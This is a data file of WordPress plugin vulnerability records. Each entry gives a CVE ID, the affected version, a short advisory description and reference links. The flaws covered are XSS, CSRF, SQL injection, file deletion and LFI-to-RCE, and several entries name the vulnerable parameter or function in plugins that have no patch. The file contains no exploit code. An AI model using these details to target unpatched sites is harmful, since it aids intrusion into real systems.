{"CVE_ID":"CVE-2025-23435","slug":"password-protect-plugin-for-wordpress","versionImpact":"0.8.1.0","description":"Cross-Site Request Forgery (CSRF) vulnerability in David Marcucci Password Protect Plugin for WordPress allows Stored XSS.This issue affects Password Protect Plugin for WordPress: from n\/a through 0.8.1.0.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/password-protect-plugin-for-wordpress\\\/vulnerability\\\/wordpress-password-protect-plugin-for-wordpress-plugin-0-8-1-0-csrf-to-stored-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/password-protect-plugin-for-wordpress\\\/vulnerability\\\/wordpress-password-protect-plugin-for-wordpress-plugin-0-8-1-0-csrf-to-stored-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13780","slug":"hmenu","versionImpact":"1.16.5","description":"The Hero Mega Menu - Responsive WordPress Menu Plugin plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the hmenu_delete_menu() function in all versions up to, and including, 1.16.5. This makes it possible for unauthenticated attackers to delete arbitrary directories on the server.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/hero-menu-responsive-wordpress-mega-menu-plugin\\\/10324895\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/hero-menu-responsive-wordpress-mega-menu-plugin\\\/10324895\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17872fe4-b566-44ca-8218-3677fb75cb1c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17872fe4-b566-44ca-8218-3677fb75cb1c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2165","slug":"sh-email-alert","versionImpact":"1.0","description":"The SH Email Alert plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'mid' parameter in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sh-email-alert\\\/tags\\\/1.0\\\/manage.php#L156\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sh-email-alert\\\/tags\\\/1.0\\\/manage.php#L156\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sh-email-alert\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sh-email-alert\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc20180b-4665-4ade-b512-b0f0148200e7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc20180b-4665-4ade-b512-b0f0148200e7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5287","slug":"inprosysmedia-likes-dislikes-post","versionImpact":"1.0.0","description":"The Likes and Dislikes Plugin plugin for WordPress is vulnerable to SQL Injection via the 'post' parameter in all versions up to, and including, 1.0.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/inprosysmedia-likes-dislikes-post\\\/trunk\\\/inprosysmedia-likes-dislikes-post.php#L76\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/inprosysmedia-likes-dislikes-post\\\/trunk\\\/inprosysmedia-likes-dislikes-post.php#L76\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ad19205d-d355-45d8-be5b-f8005459a8c7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ad19205d-d355-45d8-be5b-f8005459a8c7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4689","slug":"ap-plugin-scripteo","versionImpact":"4.89","description":"The Ads Pro Plugin - Multi-Purpose WordPress Advertising Manager plugin for WordPress is vulnerable to Local File Inclusion which leads to Remote Code Execution in all versions up to, and including, 4.89. This is due to the presence of a SQL Injection vulnerability and Local File Inclusion vulnerability that can be chained with an image upload. This makes it possible for unauthenticated attackers to execute code on the server upload image files on the server than can be fetched via a SQL injection vulnerability, and ultimately executed as PHP code through the local file inclusion vulnerability.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/ads-pro-plugin-multipurpose-wordpress-advertising-manager\\\/10275010\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/ads-pro-plugin-multipurpose-wordpress-advertising-manager\\\/10275010\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/038ddfcd-093b-4234-a0b8-a3bf9a3d329f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/038ddfcd-093b-4234-a0b8-a3bf9a3d329f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0336","slug":"ooohboi-steroids-for-elementor","versionImpact":"2.1.3","description":"The OoohBoi Steroids for Elementor WordPress plugin through 2.1.3 has CSRF and broken access control vulnerabilities which leads user with role as low as subscriber to delete attachment.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ac74df9a-6fbf-4411-a501-97eba1ad1895\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ac74df9a-6fbf-4411-a501-97eba1ad1895\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2836","slug":"crm-perks-forms","versionImpact":"1.1.1","description":"The CRM Perks Forms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via form settings in versions up to, and including, 1.1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2917582\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2917582\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de11636b-a051-4e76-bc26-ed76f66fe0df?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de11636b-a051-4e76-bc26-ed76f66fe0df?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/Don-H50\\\/wp-vul\\\/blob\\\/main\\\/CPF-xss-exploit.md\",\"name\":\"https:\\\/\\\/github.com\\\/Don-H50\\\/wp-vul\\\/blob\\\/main\\\/CPF-xss-exploit.md\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1242","slug":"premium-addons-for-elementor","versionImpact":"4.10.18","description":"The Premium Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the button onclick attribute in all versions up to, and including, 4.10.18 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1026b753-e82b-4fa3-9023-c36ab9863b29?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1026b753-e82b-4fa3-9023-c36ab9863b29?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3035504%40premium-addons-for-elementor%2Ftrunk&old=3025571%40premium-addons-for-elementor%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3035504%40premium-addons-for-elementor%2Ftrunk&old=3025571%40premium-addons-for-elementor%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5259","slug":"dc-woocommerce-multi-vendor","versionImpact":"4.1.11","description":"The MultiVendorX Marketplace \u2013 WooCommerce MultiVendor Marketplace Solution plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018hover_animation\u2019 parameter in all versions up to, and including, 4.1.11 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/59a349f2-048d-49a5-92ea-c19f1d1cd45e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/59a349f2-048d-49a5-92ea-c19f1d1cd45e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dc-woocommerce-multi-vendor\\\/trunk\\\/packages\\\/mvx-elementor\\\/widgets\\\/class-mvx-widget-storesocial.php#L150\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dc-woocommerce-multi-vendor\\\/trunk\\\/packages\\\/mvx-elementor\\\/widgets\\\/class-mvx-widget-storesocial.php#L150\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/dc-woocommerce-multi-vendor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/dc-woocommerce-multi-vendor\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097002\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097002\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4759","slug":"mime-types-extended","versionImpact":"0.11","description":"The Mime Types Extended WordPress plugin through 0.11 does not sanitise uploaded SVG files, which could allow users with a role as low as Author to upload a malicious SVG containing XSS payloads.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1c7547fa-539a-4890-a94d-c57b3d025507\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1c7547fa-539a-4890-a94d-c57b3d025507\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7861","slug":"misiek-paypal","versionImpact":"1.1.20090324","description":"The Misiek Paypal WordPress plugin through 1.1.20090324 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/df9aa795-ba16-4806-b01a-311f80aa52c0\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/df9aa795-ba16-4806-b01a-311f80aa52c0\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10790","slug":"admin-site-enhancements","versionImpact":"7.5.1","description":"The Admin and Site Enhancements (ASE) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 7.5.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with custom-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. This feature must be enabled, and for specific roles in order to be exploitable.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/96e12fa5-eba4-4f69-ae3a-7e460bfa9e5d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/96e12fa5-eba4-4f69-ae3a-7e460bfa9e5d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/admin-site-enhancements\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/admin-site-enhancements\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3180884%40admin-site-enhancements%2Ftags%2F7.5.1&new=3185287%40admin-site-enhancements%2Ftags%2F7.5.2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3180884%40admin-site-enhancements%2Ftags%2F7.5.1&new=3185287%40admin-site-enhancements%2Ftags%2F7.5.2\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12435","slug":"woocommerce-compare-products","versionImpact":"3.2.1","description":"The Compare Products for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018s_feature\u2019 parameter in all versions up to, and including, 3.2.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-compare-products\\\/trunk\\\/admin\\\/classes\\\/class-wc-compare-fields.php#L392\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-compare-products\\\/trunk\\\/admin\\\/classes\\\/class-wc-compare-fields.php#L392\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-compare-products\\\/trunk\\\/admin\\\/classes\\\/class-wc-compare-fields.php#L397\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-compare-products\\\/trunk\\\/admin\\\/classes\\\/class-wc-compare-fields.php#L397\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f74c419a-56de-4190-925d-876d32f712e1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f74c419a-56de-4190-925d-876d32f712e1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-23423","slug":"wp-sendgrid-mailer","versionImpact":"1.4","description":"Missing Authorization vulnerability in Smackcoders SendGrid for WordPress allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects SendGrid for WordPress: from n\/a through 1.4.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-sendgrid-mailer\\\/vulnerability\\\/wordpress-sendgrid-for-wordpress-plugin-1-4-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-sendgrid-mailer\\\/vulnerability\\\/wordpress-sendgrid-for-wordpress-plugin-1-4-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13424","slug":"ni-woo-sales-commission","versionImpact":"1.2.4","description":"The Ni Sales Commission For WooCommerce plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the 'niwoosc_ajax' AJAX endpoint in all versions up to, and including, 1.2.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update the plugins settings and modify commission amounts.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ni-woo-sales-commission\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ni-woo-sales-commission\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ac4a026b-ed1c-4864-8900-1d70d95af6f4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ac4a026b-ed1c-4864-8900-1d70d95af6f4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13779","slug":"hmenu","versionImpact":"1.16.5","description":"The Hero Mega Menu - Responsive WordPress Menu Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'index' parameter in all versions up to, and including, 1.16.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/hero-menu-responsive-wordpress-mega-menu-plugin\\\/10324895\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/hero-menu-responsive-wordpress-mega-menu-plugin\\\/10324895\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/18d37650-057d-4cd1-bfeb-e40885d22566?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/18d37650-057d-4cd1-bfeb-e40885d22566?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1490","slug":"smart-maintenance-mode","versionImpact":"1.5.2","description":"The Smart Maintenance Mode plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018setstatus\u2019 parameter in all versions up to, and including, 1.5.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smart-maintenance-mode\\\/trunk\\\/smart-maintenance-mode.php#L562\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smart-maintenance-mode\\\/trunk\\\/smart-maintenance-mode.php#L562\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/smart-maintenance-mode\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/smart-maintenance-mode\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ea9ca8ac-e735-4e84-af0f-45d22a8e2124?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ea9ca8ac-e735-4e84-af0f-45d22a8e2124?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5082","slug":"wp-attachments","versionImpact":"5.0.12","description":"The WP Attachments plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018attachment_id\u2019 parameter in all versions up to, and including, 5.0.12 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-attachments\\\/tags\\\/5.0.12\\\/inc\\\/html\\\/attachmentEditIframe.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-attachments\\\/tags\\\/5.0.12\\\/inc\\\/html\\\/attachmentEditIframe.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-attachments\\\/tags\\\/5.0.12\\\/inc\\\/ij-post-attachments.php#L274\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-attachments\\\/tags\\\/5.0.12\\\/inc\\\/ij-post-attachments.php#L274\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3300269\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3300269\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-attachments\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-attachments\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bdc33ecc-da54-4852-8426-bfafe0dca41b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bdc33ecc-da54-4852-8426-bfafe0dca41b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4654","slug":"soumettre-fr","versionImpact":"2.1.5","description":"The Soumettre.fr plugin for WordPress is vulnerable to unauthorized access and modification of data due to a improper authorization checks on the make_signature function in all versions up to, and including, 2.1.5. This makes it possible for unauthenticated attackers to create\/edit\/delete Soumettre posts. This vulnerability affects only installations where the soumettre account is not connected (i.e. API key is not installed)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/soumettre-fr\\\/tags\\\/2.1.5\\\/public\\\/rest\\\/class-soumettre-rest-route.php#L211\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/soumettre-fr\\\/tags\\\/2.1.5\\\/public\\\/rest\\\/class-soumettre-rest-route.php#L211\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4f29d476-0730-437c-8065-309523278efa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4f29d476-0730-437c-8065-309523278efa?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0335","slug":"wp-shamsi","versionImpact":"4.3.3","description":"The WP Shamsi WordPress plugin through 4.3.3 has CSRF and broken access control vulnerabilities which leads user with role as low as subscriber delete attachment.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f7a20bea-c3d5-431b-bdcf-e189c81a561a\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f7a20bea-c3d5-431b-bdcf-e189c81a561a\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1236","slug":"essential-addons-for-elementor-lite","versionImpact":"5.9.8","description":"The Essential Addons for Elementor \u2013 Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Filterable Controls label icon parameter in all versions up to, and including, 5.9.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/43014ecd-72d9-44cc-be24-c0c9790ddc20?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/43014ecd-72d9-44cc-be24-c0c9790ddc20?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/trunk\\\/includes\\\/Elements\\\/Filterable_Gallery.php#L3259\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/trunk\\\/includes\\\/Elements\\\/Filterable_Gallery.php#L3259\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/trunk\\\/includes\\\/Elements\\\/Filterable_Gallery.php#L3261\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/trunk\\\/includes\\\/Elements\\\/Filterable_Gallery.php#L3261\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3034127\\\/essential-addons-for-elementor-lite\\\/trunk\\\/includes\\\/Elements\\\/Filterable_Gallery.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3034127\\\/essential-addons-for-elementor-lite\\\/trunk\\\/includes\\\/Elements\\\/Filterable_Gallery.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3065","slug":"paypal-pay-buy-donation-and-cart-buttons-shortcode","versionImpact":"1.7","description":"The PayPal Pay Now, Buy Now, Donation and Cart Buttons Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c596c278-4f16-4830-8e6e-5e1392d4d118?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c596c278-4f16-4830-8e6e-5e1392d4d118?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/paypal-pay-buy-donation-and-cart-buttons-shortcode\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/paypal-pay-buy-donation-and-cart-buttons-shortcode\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4757","slug":"logo-manager-for-enamad","versionImpact":"0.7.0","description":"The Logo Manager For Enamad WordPress plugin through 0.7.0 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b54b55e0-b184-4c90-ba94-feda0997bf2a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b54b55e0-b184-4c90-ba94-feda0997bf2a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7860","slug":"simple-headline-rotator","versionImpact":"1.0","description":"The Simple Headline Rotator WordPress plugin through 1.0 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/584156d7-928e-48c9-8b81-539ccb06f3f5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/584156d7-928e-48c9-8b81-539ccb06f3f5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
